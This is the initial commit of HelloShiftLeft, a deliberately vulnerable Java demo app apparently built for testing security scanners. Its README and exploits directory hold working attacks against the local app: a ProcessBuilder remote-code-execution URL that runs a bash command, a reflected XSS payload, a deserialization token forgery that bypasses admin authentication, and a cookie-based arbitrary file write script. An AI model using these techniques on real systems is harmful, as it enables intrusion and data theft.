initial commit

Author: Alex Hornbake

.gitignore

@@ -0,0 +1,138 @@
+*.DS_STORE
+.idea/
+.gitleaks_bin/
+repos/
+.vscode/
+.tox/
+.tool-versions
+venv/
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+pip-wheel-metadata/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+.python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+.coverage
+reports/

.inspect.yml

@@ -0,0 +1,11 @@
+inspect:
+- app:
+    name: ShiftLeftJava
+    additional-findings:
+    - hsl-secrets
+    policy: io.shiftleft/helloshiftleft
+    language: JAVA
+additional-findings:
+  hsl-secrets:
+    entropy: 0.5
+    name: secrets

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2017 ShiftLeft Inc.
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,69 @@
+# HelloShiftLeft
+
+This is a demo application which provides a real world representation of a REST service that uses a mix of convention and configuration to simulate a decent set of vulnerabilities exposed in the code. It includes scenarios such as sensitive data leaking to logs, data secrets leaks, authentication bypass, remote code execution, XSS vulnerabilites etc. The sample sensitive data is a mix of financial data such as account information, medical data of patients, and other PII data such as customer information. HelloShiftLeft also contains patterns/anti-patterns of how data is used/abused in interfaces or channels (to and from HTTP/TCP, third-party, database) that can lead to vulnerabilites. The application is built on the Spring Framework and exposes a series of endpoints and APIs for queries and simulating exploits.
+
+## Build
+ ```sh
+ $ git clone https://github.com/ShiftLeftSecurity/HelloShiftLeft.git
+ $ cd HelloShiftLeft
+ $ mvn clean package
+ ```
+ 
+## Run
+ ```sh
+ $ java -jar target/hello-shiftleft-0.0.1.jar
+```
+
+## Exercise Vulnerabilites and Exposures
+Once the application starts, vulnerabilites and exposures in it can be tested with API access patterns described below and through example scripts provided in the [exploits](https://github.com/ShiftLeftSecurity/HelloShiftLeft/tree/master/exploits) directory. These are summarized below:  
+
+### Sensitive Data Leaks to Log
+
+| URL | Purpose |
+| --- | ------- |
+| http://localhost:8081/customers/1 | Returns JSON representation of Customer resource based on Id (1) specified in URL |
+| http://localhost:8081/customers   | Returns JSON representation of all available Customer resources |
+| http://localhost:8081/patients    | Returns JSON representation of all available patients in record |
+| http://localhost:8081/account/1   | Returns JSON representation of Account based on Id (1) specified |
+| http://localhost:8081/account     | Returns JSON representation of all available accounts and their details |
+
+All the above requests leak sensitive medical and PII data to the logging service. In addition other endpoints such as `/saveSettings`, `/search/user`, `/admin/login` etc. are also available. Along with the list above, users can explore variations of `GET`, `POST` and `PUT` requests sent to these endpoints.
+
+### Remote Code Execution
+
+An RCE can be triggered through the `/search/user` endpoint by sending a `GET` HTTP request as follows:
+
+[http://localhost:8081/search/user?foo=new java.lang.ProcessBuilder({'/bin/bash','-c','echo 3vilhax0r>/tmp/hacked'}).start()](http://localhost:8081/search/user?foo=new%20java.lang.ProcessBuilder(%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%27echo%203vilhax0r%3E%2Ftmp%2Fhacked%27%7D).start())
+
+This creates a file `/tmp/hacked` with the content `3vilhax0r`
+
+### Arbritary File Write
+
+The [filewriteexploit.py](https://github.com/ShiftLeftSecurity/HelloShiftLeft/blob/master/exploits/filewriteexploit.py) script can be executed as follows to trigger the arbritary file writing through the `/saveSettings` endpoint:
+```
+$ python2 filewriteexploit.py http://localhost:8081/saveSettings testfile 3vilhax0r
+```
+This creates a file named `testfile` with `3vilhax0r` as its contents
+
+### Authentication Bypass
+
+The [exploit.py](https://github.com/ShiftLeftSecurity/helloshiftleft/blob/master/exploits/JavaSerializationExploit/src/main/java/exploit.py) script allows an authentication bypass by exposing a deserialization vulnerability which allows administrator access:
+```
+$ python2 exploit.py
+```
+
+This returns the following sensitive data:
+
+```
+Customer;Month;Volume
+Netflix;January;200,000
+Palo Alto;January;200,000
+```
+
+### XSS
+
+A reflected XSS vulnerability exists in the application and can be triggered using the _hidden_ `/debug` endpoint as follows:
+
+[http://localhost:8081/debug?customerId=1&clientId=1&firstName=a&lastName=b&dateOfBirth=123&ssn=123&socialSecurityNum=1&tin=123&phoneNumber=5432<scriscriptpt>alert(1)</sscriptcript>](http://localhost:8081/debug?customerId=1&clientId=1&firstName=a&lastName=b&dateOfBirth=123&ssn=123&socialSecurityNum=1&tin=123&phoneNumber=5432<scriscriptpt>alert(1)</sscriptcript>)
+
+It raises and alert dialogue and returns the Customer object data.

azure-pipelines.yml

@@ -0,0 +1,36 @@
+variables:
+- group: shiftleft-token
+
+trigger:
+- master
+- feature/*
+
+pool:
+  vmImage: 'windows-latest'
+
+steps:
+- task: Maven@3
+  inputs:
+    mavenPomFile: 'pom.xml'
+    mavenOptions: '-Xmx3072m'
+    javaHomeOption: 'JDKVersion'
+    jdkVersionOption: '1.8'
+    jdkArchitectureOption: 'x64'
+    publishJUnitResults: false
+    goals: 'package'
+- task: PowerShell@2
+  displayName: Download ShiftLeft cli
+  inputs:
+    targetType: 'inline'
+    script: |
+      Invoke-WebRequest -Uri 'https://cdn.shiftleft.io/download/sl-latest-windows-x64.zip' -OutFile $(Agent.HomeDirectory)\sl.zip
+      Expand-Archive -Path $(Agent.HomeDirectory)\sl.zip -DestinationPath $(Agent.HomeDirectory)\
+- task: CmdLine@2
+  displayName: Analyze with Inspect
+  inputs:
+    script: |
+      $(Agent.HomeDirectory)\sl.exe analyze --force --app ShiftLeftJavaAzWin --verbose --tag branch=$(Build.SourceBranchName) --java --cpg target/hello-shiftleft-0.0.1.jar
+    workingDirectory: '$(Build.SourcesDirectory)'
+  env:
+    SHIFTLEFT_ORG_ID: $(SHIFTLEFT_ORG_ID)
+    SHIFTLEFT_ACCESS_TOKEN: $(SHIFTLEFT_ACCESS_TOKEN)

exploits/JavaSerializationExploit/src/main/java/DoSerialize.java

@@ -0,0 +1,19 @@
+import io.shiftleft.model.AuthToken;
+import java.io.*;
+import java.util.Base64;
+import java.net.*;
+public class DoSerialize {
+
+  public static void main(String[] main) throws Exception{
+    AuthToken authToken = new AuthToken(0);
+    ByteArrayOutputStream bos = new ByteArrayOutputStream();
+    ObjectOutputStream out = new ObjectOutputStream(bos);
+    out.writeObject(authToken);
+    String finalToken = new String(Base64.getEncoder().encode(bos.toByteArray()));
+    out.writeObject(authToken);
+    out.close();
+
+    System.out.println(finalToken);
+  }
+}
+

exploits/JavaSerializationExploit/src/main/java/exploit.py

@@ -0,0 +1,14 @@
+import requests
+from subprocess import Popen, PIPE
+
+def console(cmd):
+    p = Popen(cmd, shell=True, stdout=PIPE)
+    out, err = p.communicate()
+    return (p.returncode, out, err)
+
+
+console("javac DoSerialize.java")
+cookieval = console("java DoSerialize")
+cookie = {'auth': cookieval[1].strip()}
+r = requests.post('http://localhost:8081/admin/login', cookies=cookie, data=" ",allow_redirects=True)
+print r.text

exploits/JavaSerializationExploit/src/main/java/io/shiftleft/model/AuthToken.java

@@ -0,0 +1,40 @@
+package io.shiftleft.model;
+
+import java.io.ObjectInputStream;
+import java.io.Serializable;
+
+import java.io.*;
+
+public class AuthToken implements Serializable {
+  private static final long serialVersionUID = 1L;
+
+  // yes there are only 2 roles so
+  // having them in this class should be fine
+  public static int ADMIN = 0;
+  public static int USER = 1;
+
+  private int role;
+
+  public AuthToken(int role) {
+    this.role = role;
+  }
+
+  public boolean isAdmin() {
+    return this.role == ADMIN;
+  }
+
+  public int getRole() {
+    if(this.role == ADMIN) {
+      return ADMIN;
+    } else {
+      return USER;
+    }
+  }
+
+  public void setRole(int role) {
+    this.role = role;
+  }
+  public void readObject(ObjectInputStream stream) throws IOException, ClassNotFoundException {
+    System.out.println("leeeeeeeeee");
+  }
+}

exploits/filewriteexploit.py

@@ -0,0 +1,18 @@
+import base64, md5, sys, urllib 
+import urllib2
+
+if len(sys.argv) != 4:
+    print "python2 exploit.py url (relative)filepath contentline1,contentline2"
+
+url = sys.argv[1]
+filepath =  sys.argv[2]
+content = sys.argv[3]
+
+payload = base64.b64encode(filepath+","+content)
+payloadhex = md5.md5(payload).hexdigest()
+
+print url
+opener = urllib2.build_opener()
+opener.addheaders.append(('Cookie', 'settings='+payload+","+payloadhex))
+f = opener.open(url)
+print f.read()